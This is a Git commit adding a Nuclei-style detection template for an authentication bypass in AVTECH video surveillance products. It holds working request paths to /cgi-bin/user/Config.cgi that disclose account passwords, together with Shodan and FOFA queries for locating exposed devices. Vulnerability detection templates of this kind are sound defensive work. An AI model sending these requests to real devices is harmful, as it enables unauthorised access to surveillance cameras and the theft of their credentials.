Create avtech-auth-bypass.yaml

patch-1
Ritik Chaddha 2023-05-15 23:33:12 +05:30 committed by GitHub
parent 8b2030bbb2
commit a0a92bc170
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 39 additions and 0 deletions

View File

@ -0,0 +1,39 @@
id: avtech-auth-bypass
info:
name: AVTECH Video Surveillance Product - Authentication Bypass
author: ritikchaddha
severity: high
description: |
AVTECH Video Surveillance Products password disclosure through /cgi-bin/user/Config.cgi.
metadata:
max-req: 2
verified: "true"
shodan-query: title:"login" product:"Avtech"
fofa-query: app="AVTECH-视频监控"
tags: exposure,avtech,auth-bypass,password
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/user/Config.cgi?.cab&action=get&category=Account.*"
- "{{BaseURL}}/cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.*"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Account.Maxuser='
- 'Account.LocalPassword='
condition: and
- type: word
part: header
words:
- text/plain
- type: status
status:
- 200